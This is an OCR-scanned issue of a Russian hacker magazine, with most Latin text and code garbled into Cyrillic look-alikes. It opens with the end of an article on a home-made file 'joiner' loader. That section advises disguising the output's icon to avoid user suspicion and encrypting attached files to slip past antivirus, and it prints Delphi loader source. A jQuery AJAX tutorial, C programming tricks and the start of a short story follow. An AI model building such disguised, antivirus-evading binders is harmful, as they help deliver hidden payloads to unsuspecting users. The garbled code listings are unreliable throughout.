бы реализовать в программетакоготипа: 

1. Убрать ограничение количества добавляемых файлов. 



2 . Сделать возможной смену иконки для конечного файла, чтобы не вызы- 
вать лишних подозрений у пользователя. 

3. Расширить набор опций. Вот здесь есть, где разгуляться. Чтобы пред- 
ставлять себе примерно, что можно реализовать, я советую тебе скачать 
парочкущіпег’ов и посмотреть, какие опции реализованы там. 

4 . Уменьшить размер загрузчика. Это можно сделать как минимум двумя 
способами: во-первых, переписать программу на асме, а во-вторых, оп- 
тимизировать мой вариант. Казалось бы, оптимизировать уже некуда, но 
если ты почитаешь статью «Сверхмалые приложения» от йсітіп на сайте 
ѵѵѵѵѵѵ.тазЬр.ЫО.ги .то ѵтебя могут появиться некоторые мысли. 

5 . Встроить поддержку шифрования. Согласись, было бы здорово, если 
все прикрепленные файлы шифровались. Таким образом, антивирусы 
раньше времени не рычали бы на твой файл и к. 

6. Реализовать возможностьупаковки прикрепляемых файлов. Чем мень- 
ше будет конечный результат, тем лучше. 

Вывод 

Итак, сегодня твой арсенал пополнился еще одной полезной программой 
собственного производства, и ты в очередной разубедился, что нет ниче- 
го невозможного. Просто для достижения любой цели требуется время и 
силы. На этой ноте я хочу попрощаться, удачи тебе в твоих экспериментах! 
Возникли вопросы или предложения? Пиши!ЗС 



Крутой код программы-загрузчика 



ѴАР 

_ІіІеОІ5С_ТіІе$оигсе:ТНапсІІе; 

_ІІІеНеасІег:ЕіІеІпІПесогсІ; 
і, фсагсііпаі; 

_ЬиІТ:сЬаг; 

_іетр:сагсІіпаІ; 

В ЕѲІ N 

_ЛІе5оигсе:=Сгеа{еІІІе(рсЬаг(Рагат5іг(0)), ОЕЫ ЕРІС_РЕАО, 0, піі, 
О РЕЫ_ЕХІ5ТІ N Ѳ, 0, 0); 

ЭеіЕІІеРоіпіегИіІеЭоигсе, плуЭі^е, піі, РІ ЕЕ_ВЕОІ Ы); 
РеасІЕІІеНіІеЭоигсе, _ЫеНеасІег, БІгеОіНіІеНеасІег), _іетр, піі); 

Т_ЫеНеас1ег._П1еСоип1:=0 іЬеп ЕхТ; 
1югі:=СНо_ЕІеНеасІег._ЕІІеСоипРІ сіо 
Ьедіп 

_ЫеВІ8С=СгеаІеРІІе(рсЬаг(5ігіпдИіІеНеасІег._Ыепате[і])), 
ѲЕЫЕРІС_ѴѴРІТЕ, ЕІЕЕ_5НАРЕ_ѴѴРІТЕ, 
піі, 

СРЕАТЕ_ЫЕѴѴ, 0, 0); 

Іогр=1 1о_ЕІеНеасІег._ЕІе5І2е[і] сіо 
Ьедіп 

РеасІЕіІеНіІеЭоигсе, _ЬиІі : , зігеОК-ЬиЩ, _іетр, піі); 
ѴѴгіІеЕІІеМіеВізС-ЬиіТ 8 І 2 еОІ(_ЬіЖ], _1етр, піі); 
епб; 

СІозеНапсІІеИіІеВізі); 

51еер(100); 

епсі; 

С1озеНапс11е(_П1е5оигсе]; 

ЕЫО. 
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Зборис вольфсон 






2.0 в пользу программера 

Технология АМХ в нашем любимом фреймворке 

А1АХ — эти четыре буквы стали неотделимы от идеологии ѴѴеЪ 2.0, а библиотек для разработ- 
ки АІАХ-приложений уже больше нескольких сотен. Легковесная библиотека (19 килобайт!) 
]0иегу обеспечивает широкие возможности в этой области, а набор различных плагинов делает 
ее подходящим инструментом для разработки современных приложений. 



Ты готов? 

В этой статье я расскажу, как просто создавать веб-приложения с исполь- 
зованием концепции АТАХ. Я человек разумный, поэтому не буду писать 
с нуля, а возьму в качестве фреймворка іОиегу. Почему именно его? Есть 
по крайне мере две причины. Первая — это действительно качественный 
фреймворк. Вторая — он независитотсерверныхтехнологий, поэтому 
можно применятьлибо связку ИАМР (с любым языком на стороне сервера, 
несколько примеров есть во врезке), либо ѴѴІпбоѵѵз-платформу. Таким 
образом, мы сможем сосредоточиться на клиентской части. По поводу 
серверной части оригинальничать не стану — возьму РНР, но специальные 
библиотеки дляіОиегу задействовать не стану, чтобы сохранилась прозрач- 
ность. В реальных проектах есть смысл использовать РСІиегу или писать 
вспомогательный код на РНР Для самых ленивых есть вариантеще про- 
ще: использовать СМ5, которая поддерживаетіОиегу, например Огираі. 

Немного условностей 

Хочу сразу пояснить, чтоя не буду приводить здесь полный код скриптов. 
Во-первых, за большое количество кода редактор обещал окунуть меня 
в чан с серной кислотой (обычно для нерадивыхавторов используют 
соляную кислоту, так что я насторожен). Во-вторых, все исходники есть на 
диске. В начале статьи я покажу, как писать скрипты на довольно низком 
уровне, а затем — как работать с многочисленными плагинами. Таким 
образом, мы рассмотрим почти весьспектр применения )Оиегу в качестве 
кл и е нтс ко й АТАХ- п л атф о р м ы . 



И последнее примечание: если ты незнаком сіОиегу и ТаѵаЗсгірІ, тебе 
может быть немного сложновато; рекомендую почитать предыдущие 
выпуски нашего журнала — в них много интересного, втом числе описы- 
ваются основы іОиегу. 

Почти ассемблер 

Для начала разберемся, как написать все самому с нуля, на не- 
сложном примере. Сейчас разного рода блогов и систем новостей 
пруд пруди. Новость (или другой материал) обычно состоит из двух 
частей: анонса и основной части. Анонс, как правило, показыва- 
ется на главной страничке или в общем списке новостей. Новость 
целиком отображается на отдельной странице. Попробуем не от- 
крывать новые странички для каждой новости, а загружать ее пол- 
ный вариант вместо анонса. При этом вся работа будет происходить 
на одной странице. Такой подход называется зіпдіе раде арріісаііоп 
(5РА). Он распространен именно при использовании методологии 
АТАХ. Плюсы и минусы обсудим позже, сейчас набросаем простень- 
кий дизайн: 

Новость у нас будет состоять из двух вложенных слоев: 

ИСХОДНЫЙ КОД ОДНОЙ НОВОСТИ 

НТМІ_ 

«Тіѵ с1азз="пемз"> 

<Ъ.2 >Заголовок< /Ь2 > 
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<с!іѵ с1азз= "петлгз-іс1">1</с1іѵ> 



</с!іѵ> 



Слой класса пеѵѵз играет роль контейнера, а пеѵѵз-ісі — невидимый 
слой с идентификатором новости. Именно его будем передавать на 
сервер, а он по этому числу определит, какую новость мы хотим полу- 
чить полностью. С пользователем будем взаимодействовать самым 
простым способом: клик по заголовку вызоветзагрузку полной версии 
новости. Заголовки можно выбрать ССЗ-определением «.пеѵѵз Ь2». 
Чтобы послать серверу запрос (в нашем случае Р05Т-запрос), будем 
использовать метод $.розІ, которому надо передать адрес для запроса 
параметры и функцию для асинхронного ответа: 



ОТПРАВКА Р05Т-ЗАПР0СА НА СЕРВЕР 
МѴА5СВІРТ 

$(с!оситепС) . геасіу ( РипсСіоп ( ) 



Новостная система «Горячие новости 



Сервер должен по пришедшему айдиш нику выбирать новость из базы 
данных, я же ограничусь схемой: 



. пемз Ь.2 " ) . сііск ( бипскіоп ( ) { 

ѵаг гезропсіСопСаіпег = $(Ыііз) . рагепк() 

$ . розС ( " аз ах . рНр " , 

{ пемзісі: $(Ыііз) . рагепкО . сЫ1йгеп( 



ОБРАБОТКА НАЧАЛА И ЗАВЕРШЕНИЯ ЗАПРОСОВ 

РНР 



^ согііпд 



) ; 

}) ; 

}) ; 

Рассмотрим более подробно, какпроисходит обмен данными между кли- 
ентом и сервером. Клиент посылает запрос с помощью $.розІ, передает 
параметры и функцию, которая будет вызвана при получении ответа. 

Этой функции в качестве аргумента баіа будет передан ответ, который 
сгенерируетскриптна стороне сервера. Мы же этотответзапишем в 
гезропбСопІаіпег — біѵ, в котором хранится наша новость. 

Если не думать о пользователе, то это все ;). Но интер нет- пользова- 
тели — народ капризный и нервный. Представь, кликнул один такой 
по заголовку новости, а ничего не происходит. На самом деле еще как 
происходит: клиент серверу послал запрос и ждет не дождется ответа. 
Надо это пользователю и показать. іОиегу предоставляет механизмы 
для этой нелегкой работы. Нам доступны события $(...).аіах5і:аг1: и $(...). 
а]'ах51ор, которые срабатывают при начале АЭАХ-за проса и при его 
остановке. Им, как и любым другим событиям, надо передать функции 
для вызова. Еще мы возьмем для этого простое анимированное изоб- 
ражение и положим его в біѵ#ІоасІіпд в правый верхний угол, который 
по умолчанию будет невидимым. Далее пропишем действия при 
старте запроса и при его окончании: 



// Печатаем текст по значению пемзісі 
// есПо «<НТМЬ 
// <с1іѵ с1азз="пемз"> 

// <Ь.2>Заголовок</Ь.2> 

/ / Текст новости 

// ссііѵ с1азз = "пемз-іс!">$іс1</с1іѵ> 

// < / с!іѵ> 

// НТМЬ; 

?> 

На сервере я сэкономил :]. Обратить внимание стоит на первую 
строчку, где получается значение параметра, переданного скрип- 
ту на вход. Как и в обычном скрипте, ее надо брать из массива 
$_Р05Т. Дальше выводим полный текст новости, который обычно 
хранится в базе данных или в файлах (у особых экстре мал о в) . Со- 
средоточимся на клиенте, мне осталось поведать тол ько про С55. 
Необходимо спрятать два слоя: . пеѵѵв-ісі и #Іоабіпд. Для удобства 
пользователя сделаем курсор мыши «перстом мудрости», когда 
он наводит на заголовок новости, чтобы посетитель понял, где 
можно (и нужно) кликать: 



ОБРАБОТКА НАЧАЛА И ЗАВЕРШЕНИЯ ЗАПРОСОВ 
МѴА5СВІРТ 

$ ( " #1оасН_пд" ) .азахЗСагС (ГипсСіоп ( ) { $ (СМз) . зПотлА ) ; 
}); 

$ ( " ^оасИпд" ) . а^ ахЗСор ( РипсСіоп ( ) { $ (Шз) .Ъісіе ( ) ; 

Щ 

Нет более тяжелой задачи, чем отображение процесса анимации на бу- 
маге, но Ргіпі Зсгееп мне поможет (смотри соответствующие картинки). 



адреса и явки 



ѵѵѵѵѵѵ.]диегѵ.сот — официальный сайтіОиегу. 
ЬПрУ/босз.щиегу.сот/РІ-идіпз — официальный список плагинов. 
ѵѵѵѵѵѵ.таІзцр.сот/ідиегѵЛогт — плагин для создания А^Х-форм. 
ѵѵѵѵѵѵ.рЬр[еНег.сот/Рето/А)ахГІ[еЦр[оасІ -Рето — плагин для загрузки 
файлов. 

ѵѵѵѵѵѵ.зІІІЬиего.бе/ідиегѵЛаЬз — плагин для создания табов. 
ЬПрУ/таІзир.сот^диегѵ/Ыоск — плагин для блокировки интерфейса 
пользователя. 
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^ согііпд 




к - - 

Пользователь щелкает по заголовку краткой версии новости 




члиентотправляетзапрос на сервер, и в правом верхнем углу включается 
нимация 




представление! Первым номером у нас будетіОиегу Рогт Ріидіп, который 
отвечаетза передачу форм с помощью А^Х. Плагин действительно важ- 
ный. Он полностью воплощает идеологию ІОиегу — «ѴѴгііе Іевз. йо тоге». 
Обработка форм практически не отличается отобычной, а в описание 
формы вообще не надо вносить изменения. Достаточно написать обра- 
ботчикдля оправления формы и изменить код на сервере, чтобы ответ 
был не на новой страничке, а на той же, что и форма. Это оченьудобно, 
например, для комментариев кстатьям. Клиентский код в простейшем 
случае будеточень прост: надо использовать либо метод $(...).аіахРогт, 
либо$(...).аіах5иЬтіі, они имеют некоторые различия в своей работе. 
Хочу отметить, что плагин автоматически поддерживает работу как с 
Э50 N , так и сХМІ_, что вкупе с вышеуказанными достоинствами делает 
его оченьудобным нетолько для написания приложений, что называет- 
ся, с нуля, но и для переделки под А^Х существующих сайтов. 

Маігіхиріоасіесі 

При программировании форм особняком стоитзагрузка файлов, для 
которой можно использовать несколько плагинов. Я остановился на А|’ах 
Рііеііріоасі прежде всего потому, что придется вносить минимум изменений 
в готовый код — как и в предыдущем случае, надо написать клиентский 
скрипт и подделать серверный. Плагин добавляетспециальный метод 
$.аіахРІІеІІр[оасІ, которому необходимо передать следующие параметры: 

ПАРАМ ЕТРЫ М ЕТОДА М ЕТОД $. АЭАХРІ І.ЕІІ РЮАЭ 

игі — адрес скрипта обработчика 

біІеЕІешепбІб — іприб -элемент типа бііе, который ис- 
пользуется для загрузки файла 
бабаТуре — формат данных, например '^зоп' 
зиссезз — функция, которая будет вызвана при успешной 
передаче данных 

еггог — функция, которая будет вызвана при ошибке 

На кнопку«Загрузка» необходимо повеситьобработчиксобытия по клику 
«геіигп а] а х Рі Іе ІЭ р Іо а сі ( ) ; » . Дальше в духовку на двадцать минут — и пирог готов. 

Табы — всему голова 

Плагин, созданный Клаусом Хартлом для табов, — действительно мощный 
(очень рекомендую ознакомиться с полной демкой у него в блоге), и он 
поддерживает А^Х. Прежде всего опишемтабы на НТМБ: 



Іриходит ответ отсервера, прекращается анимация, отображается 
юлный текст новости 



Интеграция с РНР и Регі 



ФРАГМЕНТ КАСКАДНЫХТАБЛИЦ СТИЛЕЙ ДЛЯ 
«ГОРЯЧИХ НОВОСТЕЙ» 

С55 

Ъ.2 { сигзог: роіпбег; } 

#1оабіпд, . пеѵтз-іб { бізріау: попе; } 

Все, с низкоуровневыми механизмами разобрались, такчто самое страш- 
ное позади. Теперь будем использовать готовенькое - перейдем к обзору 
плагинов, которые можно использовать для написания А^Х-приложений. 

Форма имеетзначение 

Посмотрим, какие плагины позволятоблегчить наш нелегкий труд веб- 
разработчиков. Все адреса плагинов (атакжедоков и сэмплов) можно 
найти во врезке, ктомуже я положу это богатство на диск. Чтож начнем 



РОиегу — интеграция с 

ѵтѵ\лпдсосІег5.сот/рНр/рдиегу-рНр-апсІ-ідиегу| 



Проект РОиегу — это набор РНР-библиотекдля взаимодействия сіОиегу. 
Библиотека совместима с четвертой и пятой версией РНР. Кроме исход- 
ного кода, в РОиегу в дистрибутив включена документация и демонстра- 
ционные скрипты. 



^иегу-1 .05 — интеграция с 
ННр://зеагсН.срап.огд/~ре1егд^0иегу-1.05І 



Модуль из архива СРАЫ обеспечивает интеграцию нетолько с самой биб- 
лиотекой ІОиегу, но и с дополнительными модулями. Имеются многочис- 
ленные демки, а вотс доками дела обстоят хуже. 
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^ согііпд 



СПИСОКТАБОВ 

НТМІ_ 

<сііѵ іс!= " ЕаЬ-сопЕаіпег " > 

<и1> 

<1іха Ь.ге^= " ЕаЬ_1 . ЬЪтІ " >Первый</ах/1і> 

<1іха Ьге^= " ЕаЬ_2 . ІіЕтІ " >Второй</ах/1і> 

<1іха Ъ.ге:Ё:= " ЕаЬ_3 . ЬЕтІ " >Третий</ах/1і> 

</и1> 

</<ііѵ> 

Обычный список, не болеетого. Подключаем файл с плагином... и начи- 
наем писать код? Ничего подобного! Я бы в качестве слогана для ІОііегу 
выбрал что-то вроде: «Делай, что хочешь, одной строчкой кода!» Для 
того чтобы стандартный список ссылок стал табами, надо просто вызвать 
метод іабз у слоя, в котором он лежит: 

ВКЛЮЧАЕМ ТАБЫ 

МѴА5СВІРТ 

$ ( ' #ЕаЬ-сопЕаіпег ' ) . ЕаЬз ( { гешоОе: Егие }); 

Истинность параметра гетоіе как раз и означает, что содержимоетабов 
будет загружаться с сервера. И это необязательно статические НТМБ- 
файлы, в реальных приложениях это серверные скрипты. В качестве 
примечания скажу, что во время написания статьи вышла свежая версия 
этого плагина с некоторыми усовершенствованиями, смотри сайт а втора. 

Ставим блок 

Рассмотрим еще один вспомогательный плагин, который используется 
для блокировки интерфейса пользователя. Подобного рода функционал 
играетдвоякую роль: во-первых, он может показывать пользователю, что 
происходит процесс передачи данных или другой процесс; во-вторых, он 
не дает пользователю взаимодействовать с элементами интерфейса в 
ненужный момент, на при мер три раза отправить форму. В качестве допол- 
нительной возможности с помощью этого плагина можно организовать 
модальные диалоговые окна. Диспозиция ясна, план готов — в бой. 

Плагин ВІоскІЛ позволяет произвести все необходимые нам действия. На- 
чнем с блокировки страницы в целом. Сценарий, при котором это необходимо 
делать, встречается достаточно часто. Фактически после любой отправки 
запроса на сервер нежелательно, чтобы пользователь взаимодействовал с 
веб-страничкой до получения ответа. И один из выходов — заблокировать 
страницу в целом, тем более что сделать это очень просто: достаточно вызвать 
метод$.ЫоскІІІ(). Если в качестве параметра передать ему идентификатор 
элемента веб-страницы, например слоя, то он будет использован в качестве 
сообщения, иначеувидит забугорное «Ріеазеѵѵаіі...» (смотри картинку). 
Можно передать параметром и НТМБ-код, тогда будет показан он. В 
качестве рекомендации скажу, что лучше использоватьанимированное 
изображение, чтобы продемонстрировать, что процесс идет. 

Послетого как вызван метод $.ЫоскІЛ(], можно писать АОАХ-код, при 
получении ответа сервера интерфейс пользователя автоматически 
разблокируется. Но блокировать доступ ко всей странице в целом не 
всегда хорошо. Более гибкий подход предусматривает отключениетолько 
определенных элементов. Если пользователь отправляет данные с 
помощью формы, то и отключать стоиттолько ее, с остальными элемен- 
тами посетитель сайта должен иметь возможность работать. ВІоскІЛ 
реализует та кой вид блокировки при помощи метода $(...).Ыоск(). Рецепт 
прост: форма — 1 шт., ІОиегу — 1 шт., ВІоскІЛ — 1 шт., десятокэлементов 
на форме. ІОиегу и ВІоскІЛ загрузить, форму положить в слой сЛѵіогт, 



заполнить данными по вкусу, заблокировать форму $(‘сІ іѵ.боггтт ’) . Ыоск() до 
полной пересылки данных. Для активации аналогичным образом исполь- 
зовать метод ипЫоскО. 

$( м #агІісІе").Ыс1е() 

Немало интересного удалось вставить в узкие рамки статьи, но все же 
мелкие подробности осталисьза кадром. Оправдаться могулишьтем, что 
все использованные материалы (исходники, доки и прочие вкусности) бу- 
дут выложены на диск. Полезнотакже пройтись по ссылочкам, приведен- 
ным встатье, вособенности посмотреть официальный список плагинов, 
который достаточно часто пополняется, в том числе и плагинами для 
АЗАХ. Кромеувеличения числа плагинов, улучшается их функционал и 
различные опции — стоит скачать новые версии, если они появятся. ~§г 

ЬІШДМДЫШ 

Пока писал скрипт примера для статьи, поймал себя на мысли, что дизайн 
странички получился «дванольным». Действительно, ему присущи 
многие элементы современных веб-страниц, хотя все действия заняли 
от силы полчаса. Именно этим объясняется простота страницы — одна из 
популярных концепций современного веб-дизайна :). Обычно ситуация 
бываетобратная: в дизайне оказывается слишком много элементов и ин- 
формационного мусора, и страницу приходится «разгружать». Достаточно 
крупные шрифты, втом числе и заголовка, также позволяют пользователю 
быстро сориентироваться, где он, и прочитать страничку в режиме скани- 
рования, проще говоря, бегло просмотреть. 

Следующие два элемента были сделаны при помощи ОаѵаБсгірІ:. Оста- 
новимся на них чуть подробнее. Во-первых, это скругленные уголки, о 
которых я уже писал в предыдущих статьях. Они сделаны при помощи 
плагина кіОиегу с непредсказуемым названием согпег ріидіп. Во-вторых, 
это модный эффект отражения улоготипа. Самое забавное, что отражение 
я сделал не в Фотошопе ;). Есть достаточно неплохой скрипт геііесбоп. 

Іб ѵі .6, который позволяет делать такие вещи. Надо просто добавить к 
изображению класс геЕесС Есть реализация и для ІОиегу. Более гибкие 
настройки, например прозрачность, также реализуемы. Хочу отметить, 
что использование ОаѵаБсгірі для создания дизайна уже носитхарактер 
тенденции, а не дизайнерской прихоти. 



Дизайн 2.0 с помощью плагинов для ІОиегу 
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КРИС КАСПЕРСКИ 



Трюки от крыса 

Наконец-то мы добрались и до вопросов стиля про- 
граммирования, вытащив из копилки три любопытных 
трюка, способствующих повышению ясности листинга 
и страхующих программиста от совершения неявны 
ошибок (особенно при работе в коллективной ср 



рекурсия вместо циклов 

Как известно, большую часть процессорного времени про- 
грамма проводит в циклах и потому их оптимизация может дать весьма 
позитивный результат. Рассмотрим простейший цикл вида: 

іог(і = 0; і < п; і + +) гезиШ *= п; 

Атеперь попробуем извратиться, заменив цикл рекурсивным вызовом 
функции, в результате чего у нас получится следующий код: 

іоо(іпі п, іпі гезиШ) 

{ 

і б (п) геОигп іоо (п — 1 , гезиШ * п) ; 
геіигп гезиШ; 

} 



однако некоторые алгоритмы в рекурсивной форме имеютболее 
естественный и наглядный вид. Следовательно, их отладка упроща- 
ется, а вероятность совершения ошибок уменьшается. Многие руко- 
водства по оптимизации настоятельно рекомендуют избавляться от 
ресурсоемкой рекурсии еще на стадии кодирования, однако в случае 
хвостовой рекурсии компилятор все сделаетза нас сам! 

Однако следует помнить, что этоттрюк не распространяется на ос- 
тальные виды рекурсии и с оптимизацией рекурсивного вычисления 
чисел Фибоначчи компиляторуже не справляется: 

ііЪ ( іпі п) 

{ 

л б (п < 2) геСигп 1; 

геіигп ііЪ(п - 1) + ііЪ(п - 2 ) ; 

} 




На первый взгляд кажется, что рекурсивный вариантбудетужасно 
тормозить, поскольку накладные расходы на передачу аргументов 
и вызов функции чрезвычайно велики, ктомуже возникает прямая 
угроза исчерпания стека при большом количестве итераций. На самом 
деле компиляторы уже давно научились избавляться отхвостовой 
рекурсии, трансформируя ее в цикл, что подтверждается дизассем- 
блерным листингом, приведенным ниже (примечание: хвостовой 
рекурсией — іаіі гесигзіоп — называетсятакойтип рекурсии, при 
котором вызов рекурсивной функции следует непосредственно за 
оператором геіигп): 

ФРАГМЕНТ ДИЗАССЕМБЛЕРН0Г0 ЛИСТИНГА, ДЕМОНСТРИРУЮ- 
ЩИЙ, КАК КОМПИЛЯТОР МІСВ050РТѴІ51ІАІ- С++ 6.0 СУМЕЛ ИЗБА- 
ВИТЬСЯ ОТ РЕКУРСИИ 

ШехС : 0000006С 1ос_6С: 

ШехС : 000000 6С шоѵ ебх, есх 

ШехС : 000000 6Е ішиі еах, есіх 

. ЕехС :00000071 сіес есх 

. ДехС : 00000072 з'п 2 зіюШ 1ос_6С 

Сгенерированный компилятором код оптимизированного цикла 
полностью идентичен своему неоптимизированному собрату. И в чем 
же тогда состоит обещанный выигрыш?! В данном случае ни в чем, 



В дизассемблерном листинге мы отчетливо видим два вызова фун- 
кции ІіЬ, которые приводят к огромному падению производитель- 
ности, совершенно не компенсируемому улучшением читабельнос- 
ти и наглядности алгоритма. 

ФРАГМЕНТ ДИЗАССЕМБЛЕРН0Г0ЛИСТИНГАС НЕХВОСТОВОЙ 
РЕКУРСИЕЙ 



ЩехД : 00000030 


|ІЬ 


ргос 


пеаг 


. СехО : 00000030 








. СехО : 00000041 








. ЕехС : 00000041 


1ос_41: 






. ЕехС : 00000041 


Іеа 


еах. 


[езі- 


. ЕехС : 00000044 


ризЪ 


ебі 




. СехС : 00000045 


ризЪ. 


еах 




. СехС : 00000046 


саіі 


_1іЬ 




. СехС : 0000004В 


бес 


езі 




. ЕехС : 0000004С 


шоѵ 


ебі , 


еах 


. СехС : 0000004Е 


ризЪ. 


езі 




. ДехД : 0000004Е 


саіі 


_ііЪ 




. ЕехЦ : 00000054 


абб 


езр , 


8 


. ЕехС : 00000057 


абб 


еах, 


ебі 


. СехС : 00000059 


рор 


ебі 
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. іехі : 0000005А рор езі 

. іехі : 0000005В геіп 
. іехі : 0000005В ііЪ епсір 



сокрытие ветвления в логических операторах 

ЯзыкСи (как и остальные языки высокого уровня) всегда 
оптимизирует выполнение логических операторов (даже если все 
опции оптимизации выключены). Если выражение іоо не равно нулю, 
то вычисление выражения Ьаг в конструкции (іюо II Ьаг) никогда не вы- 
полняется. Соответственно, если іоо равно нулю, то в конструкции (іоо 
&& Ьаг) вычислять Ьаг нет никакой необходимости. Болеетого, если 
бы такое вычисление выполнялось, то привычная конструкция 
(т && п/т) привела бы к развалу программы при т, равном нулю. 

. Отсюда ветвление вида «іі (іоо==0) Ьаг;» можнозаменитьаналогичным 

ему выражением (іоо II Ьаг): 

КЛАССИЧЕСКИЙ ВАРИАНТ С ВЕТВЛЕНИЕМ 

іі (іоо==0) ту_іипс (х,у , 2 ) ; 

ОПТИМИЗИРОВАННЫЙ ВАРИАНТ 

_ іоо I I ту_іипс (х,у , 2 ) ; 

И хотя ветвления на самом деле никуда не делись (компилятор 
послушно вставит их в код втом же самом количестве, что и раньше), 
этоттрюк можно использовать, например, чтобы прищемить членов 
жюри на олимпиадных и конкурсных задачах в стиле «отсортировать 
т чисел, используя не более к сравнений». 

Другое (более существенное) преимущество — выражение, в отличие 
отявных ветвлений, может использоваться где угодно, существенно 
упрощая программирование и повышая наглядность листинга: 

НЕОПТИМИЗИРОВАННЫЙ ВАРИАНТ 

іог (;;) 

{ 

зоте_іипс ( і , □ , к) ; 
іі (іоо==0) шу_іипс (х ,у , 2 ) ; 

} 



Если заменить ветвления логикой, весь цикл укладывается в одну 
строку без всяких фигурных скобок: 

іог (;;) зоше_іипс ( і , } , к) , (іоо И ту_іипс (х,у , 2 ) ) ; 

И хотя некоторые могутзаявить, что неоптимизированный вариант 
более нагляден, это нетак. Наглядность на 90% вопрос привычки, 
однако скорость чтения (и восприятия) листинга обратно пропорци- 
ональна его размеру, и потому компактный стиль программирования 
более предпочтителен. 

опасайся операторов «—» и «++» 

За постфиксными операторами «--» и «++» закрепилась 
дурная слава небезопасных и приводящих к неопределенному 
поведению (по-английски ипсіеііпесі ЬеЬаѵіог, или сокращенно и Ь) , 



ссылками на которое пестрит текст Стандарта и многочисленных 
руководств по Си/Си++. 

Практически все знают, что результат вычисления функции іоо(х++, 
х++) зависит не только от значения переменной х, но и особен- 
ностей используемого транслятора, ведь порядок вычисления 
аргументов отдан на откуп реализаторам и компиляторы могут 
вычислять их в произвольном порядке. Отсюда и иЬ. 

Считается, что если префиксный/постфиксный оператор встре- 
чается до точки следования всего один раз, то такая конструкция 
безопасна, однако это идеализированное утверждение, не учиты- 
вающее суровых реалий программисткой жизни. 

Вопрос на засыпку. Является ли конструкция іоо(++і, ++]} 

( небезопасной и почему? На первый взгляд, здесь все законно и 
никакого иЬ не возникает. В случае если іоо является функцией, это 
действительно так, ну а если это макрос вида «#сіеі іпе тах(щ) ((і) < 
[]} ? (і) : Ц))», на выходе препроцессора мы получим следующий код: 

( (+ + І) < (++3) ? ( + + ]) : (+ + І) ) 

Теперьуже и слепой увидит, что переменные инкрементируются 
дважды, и мы получаем довольно неожиданный результат. Но ведь 
не будешьже каждый листинг прогонять через препроцессор! 
Болеетого, определения, бывшие ранее макросами, в следующей 
версии сторонней библиотеки могут превратиться в функции, 
равно как и наоборот! 

Поэтому вместо конструкции іоо(++і, ++_|) настоятельно реко- 
мендуется использовать (іоо ( (і+1 ), Ц+1 ) ), І++, і++), которая хоть и 
проигрывает в компактности/производительности, зато абсолютно 
безопасна. Кстати, обрати внимание на два обстоятельства. 

Первое — переменные разделяются неточкой сзапятой, а просто 
запятой, что делает эту запись единым выражением. Если бы мы 
использовали точку с запятой, то при изменении «іо г( ; ; ) іоо(++і, 

+ + ) ) » на «ІО г( ; ; ) ІОо( (і + 1 ); [\ + '\ ) ); І++; \++\» пришЛОСЬ бы ИСПОЛЬЗО- 
вать фигурные скобки, о которых легко забыть, особенно если іог 
находится на одной строке, а іоо — на другой. К тому же в выраже- 
ниях іі/еіве «внеплановые» фигурные скобки порождают непри- 
ятные побочные эффекты, азачемонинам? Правда... операторы, 
разделенные запятой, значительно хуже поддаются оптимизации, 
но это уже издержки, на которые приходится закрывать глаза ради 
безопасности и универсальности. 

Второе обстоятельство — круглые скобки вокруг (і+1 ) и Ц+Ц 
формально не обязательны, но! Если іоо — макрос, разработчик 
которого забыл заключить аргументы в скобки, то при его обра- 
ботке препроцессором мы можем огрести по полной программе, 
получив совсем не тот результат, который ожидали. Опять-таки с 
формальной точки зрения ответственность лежит на разработчи- 
ке макроса, но в реальной жизни мы вынуждены предугадывать 
возможные ошибки своих коллег, предпринимая превентивные 
меры по их устранению, особенно при аудите кода. Всякая за- 
мена потенциально опасных конструкций безопасными должна 
быть полностью эквивалентной в смысле побочных эффектов, 
в противном случае последствия такого аудита могут оказаться 
фатальными, т 
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Фара от мерседеса 



лепцов присел возле машины на корточки и грустно посмот- 
рел на то, что осталось от противотуманки. Черная дырка в 
бампере, следы отвертки по ее краю и уныло болтающийся 
медный провод, которым фара была привязана. 

Месяц назад по их городу прокатилась целая волна преступлений, 
связанныхс воровством автомобильной оптики. Банда действовала 
оченьдерзко и необычно: вначале кодиноко стоящей машине подъезжал 
мотоциклист на сверкающей новенькой хонде, цеплял за декоративную 
решетку радиатора трос с крюком и резкотрогался. Решетку вырыва- 
ло, открывался замок капота, и тут в дело вступала пара оперативно 
работающихдемонтажников. Вооруженные шуруповертами и прочими 
необходимыми инструментами, они снимали фары, габариты и противо- 
туманки всего за минуту. Потом прыгали в машину, которая поджидала 
их неподалеку, и изумленный хозяин машины в лучшем случаеуспевал 
увидеть пыль, поднятую ее колесами. В худшем же о краже он узнавал 
намного позже. 

Банду пытались выследить, ведьтакая приметная деталь, как новый 
спортивный мотоцикл, должна была выдавать их с головой. Но, похоже, 
что прятали они свое орудие преступления оченьтщательно — следы не 
могли найти ни местные гаишники, ни краевые. Автолюбители быстро 
оценили всю степеньугрозы и решили действовать самостоятельно. Раз 
нельзя поймать, значит, надо защищаться самим кто как может. Одни 
организовывали дежурства во дворах, другие старались не оставлять 
машину без присмотра, а третьи принялисьукреплять свое «хрустальное 
хозяйство». 

Изжелающихукрепить оптику и капот в автосервисах выстроились оче- 
реди. Цены на эти услуги моментально — какзаведено в русском бизнесе 

— взлетели. Кто-то не жалел денег, а кто-то решил справляться своими 
силами. К их числу относился и Слепцов, который чертовски дорожил 
своим фордом. 

Он сделал защиту для тросика, открывающего капот, сточил все болты, ко- 
торыми крепилисьфары, а противотуманки в бампере привязал медным 
проводом. Иллюзии защищенности хватило ровно на две недели. 
Слепцов провел пальцем по краю отверстия для фары, ощутил все не- 
ровности и тихо зарычал. Он всегда болезненно переносил проблемы с 
автомобилем, считая его членом своей семьи, а тут представил, какфару 
вышибали отверткой, а потом тянули, не ожидая того, что внутри будет 
преграда. Тянули, словно кишки, и вывернули-таки ее наружу, скорее 
всего, просто вырвав из отверстия, просверленного в пластмассовом 
корпусе! 

— Суки, — коротко сказал он. — Твари. 

Пальцы на руках хрустнули, сами собой сжимаясь в кулаки. Когда Слепцов 
представил, что бы он сделал с вором, если б застал его на месте преступ- 
ления, отбессильной злобы захотелось выть. Он встал, сделал несколько 
глубоких вдохов, пытаясь погасить пламя негодования, но это удалось ему 
едвали наполовину. 

Открыв капот, он открутил ставший ненужным медный проволочный ус и 
зашвырнул его как можно дальше. 



— Ну почему?! — скрипнул он зубами. — Меня не было ровно двадцать 
минут! Ведь никто не могзнать, что я приеду в обеденный перерыв домой! 
Что правда, то правда —домой он сегодня не собирался, да и вообще это 
было не в его правилах. Но сегодня на работе случились непредвиденные 
обстоятельства, и Слепцов был вынужден вернуться. На двадцать минут. 
